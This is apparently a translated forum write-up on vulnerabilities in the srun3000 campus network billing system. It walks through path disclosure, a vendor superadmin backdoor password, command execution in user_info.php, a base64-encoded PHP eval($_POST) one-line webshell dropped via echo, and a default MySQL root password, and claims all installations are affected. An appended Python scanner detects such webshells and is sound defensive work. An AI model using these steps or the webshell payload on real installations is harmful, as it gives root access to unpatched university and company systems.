Several vulnerabilities in srun3000 lead to getshell.
The walkthrough uses xx University of Science and Technology as the example.
1. Path disclosure: http://xxxx.xx:8080/global.php exposes all paths.
However, the actual path is /srun3/srun/services/
(1) Port 80: /srun3/web/
(2) Port 8800: /srun3/srun/services/
(3) Port 8080/8081: /srun3/srun/web/
2. Management backend (port 8080/8081): default password
Support B******s (I won't reveal it). This is the password srun uses for remote support. It has superadmin permission.
3. Command execution in /user_info.php on port 80.
Getshell:
The system runs with root permission, so Mom no longer has to worry that I have no write permission.
Because the system filters $_POST and so on, I had to use the stupid method.
Use the echo command to write <?php file_put_contents(base64_decode(/srun3/web/xx.php), base64_decode(<?php @eval($_POST['xxx']);?> where the path and the one-line shell are base64-encoded, and the path corresponds to port 80. Accessing the written file generates xx.php.
What's amazing is that the > of the php tag gets eaten. Okay, add it with echo.
Of course, there are other ways to getshell: log in to the management backend, upload an image webshell or directly upload a txt file, and copy it to a php file.
Because the srun backend, unlike a CMS, has no plug-ins that can be used to patch it directly, many universities and companies have not been able to install patches.
The above vulnerabilities work against all srun3000 installations.
The universal password, of course, works everywhere too. The default MySQL root password is srun3000. Why didn't Shenlan consider security for customers during installation and debugging? Default passwords are a killer.
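
For administrators of an affected appliance, an audit sketch added here (not part of the original post and not vendor code): it walks the three web roots listed above and flags files containing either stage described in the getshell section, including PHP hidden in uploaded image or txt files. The function names, the suffix list and the sample files in demo() are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Web roots named in the write-up (port 80, 8800, 8080/8081).
SRUN_WEB_ROOTS = ["/srun3/web", "/srun3/srun/services", "/srun3/srun/web"]

# One pattern per stage described above; tolerant of whitespace and case.
PATTERNS = {
    "eval-of-request-data": re.compile(
        rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "base64-decoded-file-write": re.compile(
        rb"file_put_contents\s*\(\s*base64_decode\s*\(", re.I),
}

def scan_file(path):
    """Return the sorted names of the patterns found in one file."""
    try:
        data = Path(path).read_bytes()
    except OSError:
        return []  # unreadable file: nothing to report
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))

def scan_roots(roots, suffixes=(".php", ".txt", ".gif", ".jpg", ".png")):
    """Walk each existing root and map file path -> matched pattern names."""
    findings = {}
    for root in roots:
        base = Path(root)
        if not base.is_dir():
            continue
        for p in base.rglob("*"):
            if p.is_file() and p.suffix.lower() in suffixes:
                hits = scan_file(p)
                if hits:
                    findings[str(p)] = hits
    return findings

def demo():
    """Constructed sample tree: a clean page, a file-writing stub, an image with PHP."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_bytes(b"<?php echo 'login'; ?>")
        (root / "a.php").write_bytes(
            b"<?php file_put_contents(base64_decode('eA=='), base64_decode('eQ==')); ?>")
        (root / "logo.gif").write_bytes(b"GIF89a<?php @eval ($_POST['k']); ?>")
        return {Path(k).name: v for k, v in scan_roots([d]).items()}

if __name__ == "__main__":
    for path, hits in scan_roots(SRUN_WEB_ROOTS).items():
        print(path, ",".join(hits))
```

A hit is a lead for manual review, not proof of compromise; an empty result does not clear the host, since the default passwords described above still need to be changed.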